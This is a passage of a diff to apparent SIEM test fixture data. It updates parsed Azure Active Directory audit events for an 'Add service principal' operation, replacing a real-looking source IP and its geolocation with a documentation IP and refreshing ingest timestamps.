\\\"291154f0-a9f5-45bb-87be-9c8ee5b6d62c\\\",\\r\\n \\\"KeyGroupId\\\": \\\"291154f0-a9f5-45bb-87be-9c8ee5b6d62c\\\"\\r\\n }\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"AccountEnabled, AppPrincipalId, DisplayName, ServicePrincipalName, Credential\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"}],\"ObjectId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Operation\":\"Add service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":2},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", "kind": "event", @@ -14051,25 +12845,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -14083,7 +12859,7 @@ "ObjectId": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40", "ResultStatus": "Success", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "actorObjectClass": "User", "teamName": "MSODS.", @@ -14226,7 +13002,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { @@ -14238,12 +13014,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036464500Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-11T16:36:31\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"AccountEnabled\\\",\\\"AppPrincipalId\\\",\\\"DisplayName\\\",\\\"ServicePrincipalName\\\",\\\"Credential\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"381d015d-6660-4dce-af99-4cd8c3b61d4d\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:36:31.1327910Z\"},{\"Name\":\"env_epoch\",\"Value\":\"NNJOH\"},{\"Name\":\"env_seqNum\",\"Value\":\"39121960\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##d409567a-16bf-49cb-a4c9-cb4608f62168_00000000-0000-0000-0000-000000000000_d409567a-16bf-49cb-a4c9-cb4608f62168\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR568\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"48403af8-b712-4e63-a999-686b631240ac\",\"ModifiedProperties\":[{\"Name\":\"AccountEnabled\",\"NewValue\":\"[\\r\\n true\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"AppPrincipalId\",\"NewValue\":\"[\\r\\n \\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"DisplayName\",\"NewValue\":\"[\\r\\n \\\"siem2\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"ServicePrincipalName\",\"NewValue\":\"[\\r\\n \\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"Credential\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"CredentialType\\\": 2,\\r\\n \\\"KeyStoreId\\\": \\\"291154f0-a9f5-45bb-87be-9c8ee5b6d62c\\\",\\r\\n \\\"KeyGroupId\\\": \\\"291154f0-a9f5-45bb-87be-9c8ee5b6d62c\\\"\\r\\n }\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"AccountEnabled, AppPrincipalId, DisplayName, ServicePrincipalName, Credential\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"}],\"ObjectId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Operation\":\"Add service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":2},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.125231900Z", + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:36:31\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"AccountEnabled\\\",\\\"AppPrincipalId\\\",\\\"DisplayName\\\",\\\"ServicePrincipalName\\\",\\\"Credential\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"381d015d-6660-4dce-af99-4cd8c3b61d4d\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:36:31.1327910Z\"},{\"Name\":\"env_epoch\",\"Value\":\"NNJOH\"},{\"Name\":\"env_seqNum\",\"Value\":\"39121960\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##d409567a-16bf-49cb-a4c9-cb4608f62168_00000000-0000-0000-0000-000000000000_d409567a-16bf-49cb-a4c9-cb4608f62168\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR568\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"48403af8-b712-4e63-a999-686b631240ac\",\"ModifiedProperties\":[{\"Name\":\"AccountEnabled\",\"NewValue\":\"[\\r\\n true\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"AppPrincipalId\",\"NewValue\":\"[\\r\\n \\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"DisplayName\",\"NewValue\":\"[\\r\\n \\\"siem2\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"ServicePrincipalName\",\"NewValue\":\"[\\r\\n \\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"Credential\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"CredentialType\\\": 2,\\r\\n \\\"KeyStoreId\\\": \\\"291154f0-a9f5-45bb-87be-9c8ee5b6d62c\\\",\\r\\n \\\"KeyGroupId\\\": \\\"291154f0-a9f5-45bb-87be-9c8ee5b6d62c\\\"\\r\\n }\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"AccountEnabled, AppPrincipalId, DisplayName, ServicePrincipalName, Credential\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"}],\"ObjectId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Operation\":\"Add service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":2},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", "kind": "event", @@ -14269,25 +13045,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -14301,7 +13059,7 @@ "ObjectId": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40", "ResultStatus": "Success", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "actorObjectClass": "User", "teamName": "MSODS.", @@ -14444,7 +13202,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { @@ -14456,12 +13214,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036468600Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-11T16:36:31\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"AccountEnabled\\\",\\\"AppPrincipalId\\\",\\\"DisplayName\\\",\\\"ServicePrincipalName\\\",\\\"Credential\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"381d015d-6660-4dce-af99-4cd8c3b61d4d\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:36:31.1327910Z\"},{\"Name\":\"env_epoch\",\"Value\":\"NNJOH\"},{\"Name\":\"env_seqNum\",\"Value\":\"39121960\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##d409567a-16bf-49cb-a4c9-cb4608f62168_00000000-0000-0000-0000-000000000000_d409567a-16bf-49cb-a4c9-cb4608f62168\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR568\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"48403af8-b712-4e63-a999-686b631240ac\",\"ModifiedProperties\":[{\"Name\":\"AccountEnabled\",\"NewValue\":\"[\\r\\n true\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"AppPrincipalId\",\"NewValue\":\"[\\r\\n \\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"DisplayName\",\"NewValue\":\"[\\r\\n \\\"siem2\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"ServicePrincipalName\",\"NewValue\":\"[\\r\\n \\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"Credential\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"CredentialType\\\": 2,\\r\\n \\\"KeyStoreId\\\": \\\"291154f0-a9f5-45bb-87be-9c8ee5b6d62c\\\",\\r\\n \\\"KeyGroupId\\\": \\\"291154f0-a9f5-45bb-87be-9c8ee5b6d62c\\\"\\r\\n }\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"AccountEnabled, AppPrincipalId, DisplayName, ServicePrincipalName, Credential\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"}],\"ObjectId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Operation\":\"Add service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":2},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.125238800Z", + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:36:31\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"AccountEnabled\\\",\\\"AppPrincipalId\\\",\\\"DisplayName\\\",\\\"ServicePrincipalName\\\",\\\"Credential\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"381d015d-6660-4dce-af99-4cd8c3b61d4d\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:36:31.1327910Z\"},{\"Name\":\"env_epoch\",\"Value\":\"NNJOH\"},{\"Name\":\"env_seqNum\",\"Value\":\"39121960\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##d409567a-16bf-49cb-a4c9-cb4608f62168_00000000-0000-0000-0000-000000000000_d409567a-16bf-49cb-a4c9-cb4608f62168\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR568\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"48403af8-b712-4e63-a999-686b631240ac\",\"ModifiedProperties\":[{\"Name\":\"AccountEnabled\",\"NewValue\":\"[\\r\\n true\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"AppPrincipalId\",\"NewValue\":\"[\\r\\n \\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"DisplayName\",\"NewValue\":\"[\\r\\n \\\"siem2\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"ServicePrincipalName\",\"NewValue\":\"[\\r\\n \\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"Credential\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"CredentialType\\\": 2,\\r\\n \\\"KeyStoreId\\\": \\\"291154f0-a9f5-45bb-87be-9c8ee5b6d62c\\\",\\r\\n \\\"KeyGroupId\\\": 